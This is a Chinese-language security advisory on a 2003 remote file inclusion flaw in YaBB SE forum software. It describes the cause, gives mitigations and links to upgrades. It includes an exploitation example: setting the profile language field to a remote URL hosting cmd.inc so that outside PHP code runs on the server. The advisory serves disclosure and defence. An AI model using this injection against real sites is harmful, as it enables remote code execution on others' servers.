YaBB SE Language远程文件包含漏洞发布时间:2003-04-22 更新时间:2003-04-22 严重程度:高 威胁程度:普通用户访问权限 错误类型:配置错误 利用方式:服务器模式 BUGTRAQ ID:7399 受影响系统 YaBB SE YaBB SE 1.1.3详细描述 YABB SE是流行的公告版系统。 YABB SE存在PHP注入漏洞,任何注册用户可以通过它的语言支持注入PHP代码,YABB SE使用include($language)来选择语言设置,但对这个变量没有初始化,攻击者可以远程进行变量控制。 要利用这个漏洞,攻击者可以通过"Change Profile"栏进行语言设置,如把语言设置为:http://zhodiac.net-dreamer.net/cmd.inc 如果目标服务器的cmd.inc包含PHP代码就可以在服务器上执行。 测试代码 见描述 解决方案 设置'allow_url_fopen' and 'register_globals'选项为OFF 升级程序: YaBB SE YaBB SE 1.1.3: YaBB SE Upgrade YaBB SE 1.5.2 https://sourceforge.net/project/showfiles.php?group_id=57105&release_id=154462 YaBB SE YaBB SE 1.4.1: YaBB SE Upgrade YaBB SE 1.5.2 https://sourceforge.net/project/showfiles.php?group_id=57105&release_id=154462 YaBB SE YaBB SE 1.5 .1 RC1: YaBB SE Upgrade YaBB SE 1.5.2 https://sourceforge.net/project/showfiles.php?group_id=57105&release_id=154462 YaBB SE YaBB SE 1.5 .0: YaBB SE Upgrade YaBB SE 1.5.2 https://sourceforge.net/project/showfiles.php?group_id=57105&release_id=154462 YaBB SE YaBB SE 1.5.1: YaBB SE Upgrade YaBB SE 1.5.2 https://sourceforge.net/project/showfiles.php?group_id=57105&release_id=154462 相关信息 Next Generation Security Technologies 参考:http://www.ngsec.com/docs/advisories/NGSEC-2003-5.txt 相关主页:http://sourceforge.net/projects/yabbse |
